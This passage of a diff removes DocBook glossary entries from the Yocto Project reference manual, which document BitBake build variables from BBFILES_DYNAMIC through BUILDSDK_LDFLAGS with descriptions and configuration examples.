-                    because invalid entries are found, which cause parsing to
-                    abort:
-                    <literallayout class='monospaced'>
-     ERROR: BBFILES_DYNAMIC entries must be of the form &lt;collection name&gt;:&lt;filename pattern&gt;, not:
-         /work/my-layer/bbappends/meta-security-isafw/*/*/*.bbappend
-         /work/my-layer/bbappends/openembedded-core/meta/*/*/*.bbappend
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBINCLUDELOGS'><glossterm>BBINCLUDELOGS</glossterm>
-            <info>
-                BBINCLUDELOGS[doc] = "Variable that controls how BitBake displays logs on build failure."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Variable that controls how BitBake displays logs on build failure.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBINCLUDELOGS_LINES'><glossterm>BBINCLUDELOGS_LINES</glossterm>
-            <info>
-                BBINCLUDELOGS_LINES[doc] = "Amount of log lines printed on failure."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If
-                    <link linkend='var-BBINCLUDELOGS'><filename>BBINCLUDELOGS</filename></link>
-                    is set, specifies the maximum number of lines from the
-                    task log file to print when reporting a failed task.
-                    If you do not set <filename>BBINCLUDELOGS_LINES</filename>,
-                    the entire log is printed.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBLAYERS'><glossterm>BBLAYERS</glossterm>
-            <info>
-                BBLAYERS[doc] = "Lists the layers to enable during the build. This variable is defined in the bblayers.conf configuration file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists the layers to enable during the build.
-                    This variable is defined in the <filename>bblayers.conf</filename> configuration
-                    file in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     BBLAYERS = " \
-       /home/scottrif/poky/meta \
-       /home/scottrif/poky/meta-poky \
-       /home/scottrif/poky/meta-yocto-bsp \
-       /home/scottrif/poky/meta-mykernel \
-       "
-                    </literallayout>
-                </para>
-
-                <para>
-                    This example enables four layers, one of which is a custom, user-defined layer
-                    named <filename>meta-mykernel</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBMASK'><glossterm>BBMASK</glossterm>
-            <info>
-                BBMASK[doc] = "Prevents BitBake from processing specific recipes or recipe append files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Prevents BitBake from processing recipes and recipe
-                    append files.
-                </para>
-
-                <para>
-                    You can use the <filename>BBMASK</filename> variable
-                    to "hide" these <filename>.bb</filename> and
-                    <filename>.bbappend</filename> files.
-                    BitBake ignores any recipe or recipe append files that
-                    match any of the expressions.
-                    It is as if BitBake does not see them at all.
-                    Consequently, matching files are not parsed or otherwise
-                    used by BitBake.
-                </para>
-
-                <para>
-                    The values you provide are passed to Python's regular
-                    expression compiler.
-                    Consequently, the syntax follows Python's Regular
-                    Expression (re) syntax.
-                    The expressions are compared against the full paths to
-                    the files.
-                    For complete syntax information, see Python's
-                    documentation at
-                    <ulink url='http://docs.python.org/3/library/re.html#re'></ulink>.
-                </para>
-
-                <para>
-                    The following example uses a complete regular expression
-                    to tell BitBake to ignore all recipe and recipe append
-                    files in the <filename>meta-ti/recipes-misc/</filename>
-                    directory:
-                    <literallayout class='monospaced'>
-     BBMASK = "meta-ti/recipes-misc/"
-                    </literallayout>
-                    If you want to mask out multiple directories or recipes,
-                    you can specify multiple regular expression fragments.
-                    This next example masks out multiple directories and
-                    individual recipes:
-                    <literallayout class='monospaced'>
-     BBMASK += "/meta-ti/recipes-misc/ meta-ti/recipes-ti/packagegroup/"
-     BBMASK += "/meta-oe/recipes-support/"
-     BBMASK += "/meta-foo/.*/openldap"
-     BBMASK += "opencv.*\.bbappend"
-     BBMASK += "lzma"
-                    </literallayout>
-                    <note>
-                        When specifying a directory name, use the trailing
-                        slash character to ensure you match just that directory
-                        name.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBMULTICONFIG'><glossterm>BBMULTICONFIG</glossterm>
-            <info>
-                BBMULTICONFIG[doc] = "Specifies each additional separate configuration when you are building targets with multiple configurations."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies each additional separate configuration when you
-                    are building targets with multiple configurations.
-                    Use this variable in your
-                    <filename>conf/local.conf</filename> configuration file.
-                    Specify a <replaceable>multiconfigname</replaceable> for
-                    each configuration file you are using.
-                    For example, the following line specifies three
-                    configuration files:
-                    <literallayout class='monospaced'>
-     BBMULTICONFIG = "configA configB configC"
-                    </literallayout>
-                    Each configuration file you use must reside in the
-                    <link linkend='build-directory'>Build Directory</link>
-                    <filename>conf/multiconfig</filename> directory
-                    (e.g.
-                    <replaceable>build_directory</replaceable><filename>/conf/multiconfig/configA.conf</filename>).
-                </para>
-
-                <para>
-                    For information on how to use
-                    <filename>BBMULTICONFIG</filename> in an environment that
-                    supports building targets with multiple configurations,
-                    see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-building-images-for-multiple-targets-using-multiple-configurations'>Building Images for Multiple Targets Using Multiple Configurations</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBPATH'><glossterm>BBPATH</glossterm>
-            <info>
-                BBPATH[doc] = "Used by BitBake to locate .bbclass and configuration files. This variable is analogous to the PATH variable."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Used by BitBake to locate
-                    <filename>.bbclass</filename> and configuration files.
-                    This variable is analogous to the
-                    <filename>PATH</filename> variable.
-                    <note>
-                        If you run BitBake from a directory outside of the
-                        <link linkend='build-directory'>Build Directory</link>,
-                        you must be sure to set
-                        <filename>BBPATH</filename> to point to the
-                        Build Directory.
-                        Set the variable as you would any environment variable
-                        and then run BitBake:
-                        <literallayout class='monospaced'>
-     $ BBPATH = "<replaceable>build_directory</replaceable>"
-     $ export BBPATH
-     $ bitbake <replaceable>target</replaceable>
-                        </literallayout>
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBSERVER'><glossterm>BBSERVER</glossterm>
-            <info>
-                BBSERVER[doc] = "Points to the BitBake remote server."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    If defined in the BitBake environment,
-                    <filename>BBSERVER</filename> points to the BitBake
-                    remote server.
-                </para>
-
-                <para>
-                    Use the following format to export the variable to the
-                    BitBake environment:
-                    <literallayout class='monospaced'>
-     export BBSERVER=localhost:$port
-                    </literallayout>
-                </para>
-
-                <para>
-                    By default, <filename>BBSERVER</filename> also appears in
-                    <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_HASHBASE_WHITELIST'><filename>BB_HASHBASE_WHITELIST</filename></ulink>.
-                    Consequently, <filename>BBSERVER</filename> is excluded
-                    from checksum and dependency data.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BINCONFIG'><glossterm>BINCONFIG</glossterm>
-            <info>
-                BINCONFIG[doc] = "When inheriting the binconfig-disabled class, this variable specifies binary configuration scripts to disable in favor of using pkg-config to query the information."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-binconfig-disabled'><filename>binconfig-disabled</filename></link>
-                    class, this variable specifies binary configuration
-                    scripts to disable in favor of using
-                    <filename>pkg-config</filename> to query the information.
-                    The <filename>binconfig-disabled</filename> class will
-                    modify the specified scripts to return an error so that
-                    calls to them can be easily found and replaced.
-                </para>
-
-                <para>
-                    To add multiple scripts, separate them by spaces.
-                    Here is an example from the <filename>libpng</filename>
-                    recipe:
-                    <literallayout class='monospaced'>
-     BINCONFIG = "${bindir}/libpng-config ${bindir}/libpng16-config"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BINCONFIG_GLOB'><glossterm>BINCONFIG_GLOB</glossterm>
-            <info>
-                BINCONFIG_GLOB[doc] = "When inheriting binconfig.bbclass from a recipe, this variable specifies a wildcard for configuration scripts that need editing."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-binconfig'><filename>binconfig</filename></link>
-                    class, this variable specifies a wildcard for
-                    configuration scripts that need editing.
-                    The scripts are edited to correct any paths that have been
-                    set up during compilation so that they are correct for
-                    use when installed into the sysroot and called by the
-                    build processes of other recipes.
-                    <note>
-                        The <filename>BINCONFIG_GLOB</filename> variable
-                        uses
-                        <ulink url='http://tldp.org/LDP/abs/html/globbingref.html'>shell globbing</ulink>,
-                        which is recognition and expansion of wildcards during
-                        pattern matching.
-                        Shell globbing is very similar to
-                        <ulink url='https://docs.python.org/2/library/fnmatch.html#module-fnmatch'><filename>fnmatch</filename></ulink>
-                        and
-                        <ulink url='https://docs.python.org/2/library/glob.html'><filename>glob</filename></ulink>.
-                    </note>
-                </para>
-
-                <para>
-                    For more information on how this variable works, see
-                    <filename>meta/classes/binconfig.bbclass</filename> in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                    You can also find general information on the class in the
-                    "<link linkend='ref-classes-binconfig'><filename>binconfig.bbclass</filename></link>"
-                    section.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BP'><glossterm>BP</glossterm>
-            <info>
-                BP[doc] = "The base recipe name and version but without any special recipe name suffix (i.e. -native, lib64-, and so forth). BP is comprised of ${BPN}-${PV}"
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base recipe name and version but without any special
-                    recipe name suffix (i.e. <filename>-native</filename>, <filename>lib64-</filename>,
-                    and so forth).
-                    <filename>BP</filename> is comprised of the following:
-                    <literallayout class="monospaced">
-     ${BPN}-${PV}
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BPN'><glossterm>BPN</glossterm>
-            <info>
-                BPN[doc] = "This variable is a version of the PN variable but removes common suffixes and prefixes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    This variable is a version of the
-                    <link linkend='var-PN'><filename>PN</filename></link>
-                    variable with common prefixes and suffixes
-                    removed, such as <filename>nativesdk-</filename>,
-                    <filename>-cross</filename>,
-                    <filename>-native</filename>, and multilib's
-                    <filename>lib64-</filename> and
-                    <filename>lib32-</filename>.
-                    The exact lists of prefixes and suffixes removed are
-                    specified by the
-                    <link linkend='var-MLPREFIX'><filename>MLPREFIX</filename></link>
-                    and
-                    <link linkend='var-SPECIAL_PKGSUFFIX'><filename>SPECIAL_PKGSUFFIX</filename></link>
-                    variables, respectively.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUGTRACKER'><glossterm>BUGTRACKER</glossterm>
-            <info>
-                BUGTRACKER[doc] = "Specifies a URL for an upstream bug tracking website for a recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a URL for an upstream bug tracking website for
-                    a recipe.
-                    The OpenEmbedded build system does not use this variable.
-                    Rather, the variable is a useful pointer in case a bug
-                    in the software being built needs to be manually reported.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_ARCH'><glossterm>BUILD_ARCH</glossterm>
-            <info>
-                BUILD_ARCH[doc] = "The name of the building architecture (e.g. i686)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the architecture of the build host
-                    (e.g. <filename>i686</filename>).
-                    The OpenEmbedded build system sets the value of
-                    <filename>BUILD_ARCH</filename> from the machine name
-                    reported by the <filename>uname</filename> command.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_AS_ARCH'><glossterm>BUILD_AS_ARCH</glossterm>
-            <info>
-                BUILD_AS_ARCH[doc] = "Specifies the architecture-specific assembler flags for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the architecture-specific assembler flags for
-                    the build host. By default, the value of
-                    <filename>BUILD_AS_ARCH</filename> is empty.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_CC_ARCH'><glossterm>BUILD_CC_ARCH</glossterm>
-            <info>
-                BUILD_CC_ARCH[doc] = "Specifies the architecture-specific C compiler flags for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the architecture-specific C compiler flags for
-                    the build host. By default, the value of
-                    <filename>BUILD_CC_ARCH</filename> is empty.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_CCLD'><glossterm>BUILD_CCLD</glossterm>
-            <info>
-                BUILD_CCLD[doc] = "Specifies the linker command to be used for the build host when the C compiler is being used as the linker."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the linker command to be used for the build host
-                    when the C compiler is being used as the linker. By default,
-                    <filename>BUILD_CCLD</filename> points to GCC and passes as
-                    arguments the value of
-                    <link linkend='var-BUILD_CC_ARCH'><filename>BUILD_CC_ARCH</filename></link>,
-                    assuming <filename>BUILD_CC_ARCH</filename> is set.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_CFLAGS'><glossterm>BUILD_CFLAGS</glossterm>
-            <info>
-                BUILD_CFLAGS[doc] = "Specifies the flags to pass to the C compiler when building for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C compiler when building
-                    for the build host.
-                    When building in the <filename>-native</filename> context,
-                    <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_CPPFLAGS'><glossterm>BUILD_CPPFLAGS</glossterm>
-            <info>
-                BUILD_CPPFLAGS[doc] = "Specifies the flags to pass to the C preprocessor (i.e. to both the C and the C++ compilers) when building for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C preprocessor
-                    (i.e. to both the C and the C++ compilers) when building
-                    for the build host.
-                    When building in the <filename>-native</filename> context,
-                    <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_CXXFLAGS'><glossterm>BUILD_CXXFLAGS</glossterm>
-            <info>
-                BUILD_CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler when building for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C++ compiler when
-                    building for the build host.
-                    When building in the <filename>-native</filename> context,
-                    <link linkend='var-CXXFLAGS'><filename>CXXFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_FC'><glossterm>BUILD_FC</glossterm>
-            <info>
-                BUILD_FC[doc] = "Specifies the Fortran compiler command for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the Fortran compiler command for the build host.
-                    By default, <filename>BUILD_FC</filename> points to
-                    Gfortran and passes as arguments the value of
-                    <link linkend='var-BUILD_CC_ARCH'><filename>BUILD_CC_ARCH</filename></link>,
-                    assuming <filename>BUILD_CC_ARCH</filename> is set.
-               </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_LD'><glossterm>BUILD_LD</glossterm>
-            <info>
-                BUILD_LD[doc] = "Specifies the linker command for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the linker command for the build host. By default,
-                    <filename>BUILD_LD</filename> points to the GNU linker (ld)
-                    and passes as arguments the value of
-                    <link linkend='var-BUILD_LD_ARCH'><filename>BUILD_LD_ARCH</filename></link>,
-                    assuming <filename>BUILD_LD_ARCH</filename> is set.
-               </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_LD_ARCH'><glossterm>BUILD_LD_ARCH</glossterm>
-            <info>
-                BUILD_LD_ARCH[doc] = "Specifies architecture-specific linker flags for the build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies architecture-specific linker flags for the build
-                    host. By default, the value of
-                    <filename>BUILD_LD_ARCH</filename> is empty.
-               </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_LDFLAGS'><glossterm>BUILD_LDFLAGS</glossterm>
-            <info>
-                BUILD_LDFLAGS[doc] = "Specifies the flags to pass to the linker when building for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the linker when building
-                    for the build host.
-                    When building in the <filename>-native</filename> context,
-                    <link linkend='var-LDFLAGS'><filename>LDFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_OPTIMIZATION'><glossterm>BUILD_OPTIMIZATION</glossterm>
-            <info>
-                BUILD_OPTIMIZATION[doc] = "Specifies the optimization flags passed to the C compiler when building for the build host or the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the optimization flags passed to the C compiler
-                    when building for the build host or the SDK.
-                    The flags are passed through the
-                    <link linkend='var-BUILD_CFLAGS'><filename>BUILD_CFLAGS</filename></link>
-                    and
-                    <link linkend='var-BUILDSDK_CFLAGS'><filename>BUILDSDK_CFLAGS</filename></link>
-                    default values.
-                </para>
-
-                <para>
-                    The default value of the
-                    <filename>BUILD_OPTIMIZATION</filename> variable is
-                    "-O2 -pipe".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_OS'><glossterm>BUILD_OS</glossterm>
-            <info>
-                BUILD_OS[doc] = "The operating system (in lower case) of the building architecture (e.g. Linux)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the operating system in use on the build
-                    host (e.g. "linux").
-                    The OpenEmbedded build system sets the value of
-                    <filename>BUILD_OS</filename> from the OS reported by
-                    the <filename>uname</filename> command - the first word,
-                    converted to lower-case characters.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_PREFIX'><glossterm>BUILD_PREFIX</glossterm>
-            <info>
-                BUILD_PREFIX[doc] = "The toolchain binary prefix used for native recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The toolchain binary prefix used for native recipes.
-                    The OpenEmbedded build system uses the
-                    <filename>BUILD_PREFIX</filename> value to set the
-                    <link linkend='var-TARGET_PREFIX'><filename>TARGET_PREFIX</filename></link>
-                    when building for <filename>native</filename> recipes.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_STRIP'><glossterm>BUILD_STRIP</glossterm>
-            <info>
-                BUILD_STRIP[doc] = "Specifies the command to be used to strip debugging symbols from binaries produced for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the command to be used to strip debugging symbols
-                    from binaries produced for the build host. By default,
-                    <filename>BUILD_STRIP</filename> points to
-                    <filename>${</filename><link linkend='var-BUILD_PREFIX'><filename>BUILD_PREFIX</filename></link><filename>}strip</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_SYS'><glossterm>BUILD_SYS</glossterm>
-            <info>
-                BUILD_SYS[doc] = "The toolchain binary prefix used for native recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the system, including the architecture and
-                    the operating system, to use when building for the build
-                    host (i.e. when building <filename>native</filename>
-                    recipes).
-                </para>
-
-                <para>
-                    The OpenEmbedded build system automatically sets this
-                    variable based on
-                    <link linkend='var-BUILD_ARCH'><filename>BUILD_ARCH</filename></link>,
-                    <link linkend='var-BUILD_VENDOR'><filename>BUILD_VENDOR</filename></link>,
-                    and
-                    <link linkend='var-BUILD_OS'><filename>BUILD_OS</filename></link>.
-                    You do not need to set the <filename>BUILD_SYS</filename>
-                    variable yourself.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILD_VENDOR'><glossterm>BUILD_VENDOR</glossterm>
-            <info>
-         BUILD_VENDOR[doc] = "The vendor name to use when building for the build host."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the vendor name to use when building for the
-                    build host.
-                    The default value is an empty string ("").
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDDIR'><glossterm>BUILDDIR</glossterm>
-            <info>
-                BUILDDIR[doc] = "Points to the location of the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the location of the
-                    <link linkend='build-directory'>Build Directory</link>.
-                    You can define this directory indirectly through the
-                    <link linkend='structure-core-script'><filename>&OE_INIT_FILE;</filename></link>
-                    script by passing in a Build Directory path when you run
-                    the script.
-                    If you run the script and do not provide a Build Directory
-                    path, the <filename>BUILDDIR</filename> defaults to
-                    <filename>build</filename> in the current directory.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDHISTORY_COMMIT'><glossterm>BUILDHISTORY_COMMIT</glossterm>
-            <info>
-                BUILDHISTORY_COMMIT[doc] = "When inheriting the buildhistory class, this variable specifies whether or not to commit the build history output in a local Git repository."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class, this variable specifies whether or not to commit the
-                    build history output in a local Git repository.
-                    If set to "1", this local repository will be maintained
-                    automatically by the
-                    <filename>buildhistory</filename>
-                    class and a commit will be created on every
-                    build for changes to each top-level subdirectory of the
-                    build history output (images, packages, and sdk).
-                    If you want to track changes to build history over
-                    time, you should set this value to "1".
-                </para>
-
-                <para>
-                    By default, the <filename>buildhistory</filename> class
-                    does not commit the build history output in a local
-                    Git repository:
-                    <literallayout class='monospaced'>
-     BUILDHISTORY_COMMIT ?= "0"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDHISTORY_COMMIT_AUTHOR'><glossterm>BUILDHISTORY_COMMIT_AUTHOR</glossterm>
-            <info>
-                BUILDHISTORY_COMMIT_AUTHOR[doc] = "When inheriting the buildhistory class, this variable specifies the author to use for each Git commit."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class, this variable specifies the author to use for each
-                    Git commit.
-                    In order for the <filename>BUILDHISTORY_COMMIT_AUTHOR</filename>
-                    variable to work, the
-                    <link linkend='var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></link>
-                    variable must be set to "1".
-                </para>
-
-                <para>
-                    Git requires that the value you provide for the
-                    <filename>BUILDHISTORY_COMMIT_AUTHOR</filename> variable
-                    takes the form of "name <replaceable>email@host</replaceable>".
-                    Providing an email address or host that is not valid does
-                    not produce an error.
-                </para>
-
-                <para>
-                    By default, the <filename>buildhistory</filename> class
-                    sets the variable as follows:
-                    <literallayout class='monospaced'>
-     BUILDHISTORY_COMMIT_AUTHOR ?= "buildhistory &lt;buildhistory@${DISTRO}&gt;"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDHISTORY_DIR'><glossterm>BUILDHISTORY_DIR</glossterm>
-            <info>
-                BUILDHISTORY_DIR[doc] = "When inheriting the buildhistory class, this variable specifies the directory in which build history information is kept."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class, this variable specifies the directory in which
-                    build history information is kept.
-                    For more information on how the variable works, see the
-                    <filename>buildhistory.class</filename>.
-                </para>
-
-                <para>
-                    By default, the <filename>buildhistory</filename> class
-                    sets the directory as follows:
-                    <literallayout class='monospaced'>
-     BUILDHISTORY_DIR ?= "${TOPDIR}/buildhistory"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDHISTORY_FEATURES'><glossterm>BUILDHISTORY_FEATURES</glossterm>
-            <info>
-                BUILDHISTORY_FEATURES[doc] = "When inheriting the buildhistory class, this variable specifies the build history features to be enabled."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class, this variable specifies the build history features
-                    to be enabled.
-                    For more information on how build history works, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-build-output-quality'>Maintaining Build Output Quality</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-
-                <para>
-                    You can specify these features in the form of a
-                    space-separated list:
-                    <itemizedlist>
-                        <listitem><para><emphasis>image:</emphasis>
-                            Analysis of the contents of images, which
-                            includes the list of installed packages among other
-                            things.
-                            </para></listitem>
-                        <listitem><para><emphasis>package:</emphasis>
-                            Analysis of the contents of individual packages.
-                            </para></listitem>
-                        <listitem><para><emphasis>sdk:</emphasis>
-                            Analysis of the contents of the software
-                            development kit (SDK).
-                            </para></listitem>
-                        <listitem><para><emphasis>task:</emphasis>
-                            Save output file signatures for
-                            <ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>shared state</ulink>
-                            (sstate) tasks.
-                            This saves one file per task and lists the SHA-256
-                            checksums for each file staged (i.e. the output of
-                            the task).
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-
-                <para>
-                    By default, the <filename>buildhistory</filename> class
-                    enables the following features:
-                    <literallayout class='monospaced'>
-     BUILDHISTORY_FEATURES ?= "image package sdk"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDHISTORY_IMAGE_FILES'><glossterm>BUILDHISTORY_IMAGE_FILES</glossterm>
-            <info>
-                BUILDHISTORY_IMAGE_FILES[doc] = "When inheriting the buildhistory class, this variable specifies a list of paths to files copied from the image contents into the build history directory under an "image-files" directory in the directory for the image, so that you can track the contents of each file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class, this variable specifies a list of paths to files
-                    copied from the
-                    image contents into the build history directory under
-                    an "image-files" directory in the directory for
-                    the image, so that you can track the contents of each file.
-                    The default is to copy <filename>/etc/passwd</filename>
-                    and <filename>/etc/group</filename>, which allows you to
-                    monitor for changes in user and group entries.
-                    You can modify the list to include any file.
-                    Specifying an invalid path does not produce an error.
-                    Consequently, you can include files that might
-                    not always be present.
-                </para>
-
-                <para>
-                    By default, the <filename>buildhistory</filename> class
-                    provides paths to the following files:
-                    <literallayout class='monospaced'>
-     BUILDHISTORY_IMAGE_FILES ?= "/etc/passwd /etc/group"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDHISTORY_PUSH_REPO'><glossterm>BUILDHISTORY_PUSH_REPO</glossterm>
-            <info>
-                BUILDHISTORY_PUSH_REPO[doc] = "When inheriting the buildhistory class, this variable optionally specifies a remote repository to which build history pushes Git changes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When inheriting the
-                    <link linkend='ref-classes-buildhistory'><filename>buildhistory</filename></link>
-                    class, this variable optionally specifies a remote
-                    repository to which build history pushes Git changes.
-                    In order for <filename>BUILDHISTORY_PUSH_REPO</filename>
-                    to work,
-                    <link linkend='var-BUILDHISTORY_COMMIT'><filename>BUILDHISTORY_COMMIT</filename></link>
-                    must be set to "1".
-                </para>
-
-                <para>
-                    The repository should correspond to a remote
-                    address that specifies a repository as understood by
-                    Git, or alternatively to a remote name that you have
-                    set up manually using <filename>git remote</filename>
-                    within the local repository.
-                </para>
-
-                <para>
-                    By default, the <filename>buildhistory</filename> class
-                    sets the variable as follows:
-                    <literallayout class='monospaced'>
-     BUILDHISTORY_PUSH_REPO ?= ""
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDSDK_CFLAGS'><glossterm>BUILDSDK_CFLAGS</glossterm>
-            <info>
-                BUILDSDK_CFLAGS[doc] = "Specifies the flags to pass to the C compiler when building for the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C compiler when building
-                    for the SDK.
-                    When building in the <filename>nativesdk-</filename>
-                    context,
-                    <link linkend='var-CFLAGS'><filename>CFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDSDK_CPPFLAGS'><glossterm>BUILDSDK_CPPFLAGS</glossterm>
-            <info>
-                BUILDSDK_CPPFLAGS[doc] = "Specifies the flags to pass to the C pre-processor (i.e. to both the C and the C++ compilers) when building for the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C pre-processor
-                    (i.e. to both the C and the C++ compilers) when building
-                    for the SDK.
-                    When building in the <filename>nativesdk-</filename>
-                    context,
-                    <link linkend='var-CPPFLAGS'><filename>CPPFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDSDK_CXXFLAGS'><glossterm>BUILDSDK_CXXFLAGS</glossterm>
-            <info>
-                BUILDSDK_CXXFLAGS[doc] = "Specifies the flags to pass to the C++ compiler when building for the SDK."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the flags to pass to the C++ compiler when
-                    building for the SDK.
-                    When building in the <filename>nativesdk-</filename>
-                    context,
-                    <link linkend='var-CXXFLAGS'><filename>CXXFLAGS</filename></link>
-                    is set to the value of this variable by default.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BUILDSDK_LDFLAGS'><glossterm>BUILDSDK_LDFLAGS</glossterm>
-            <info>
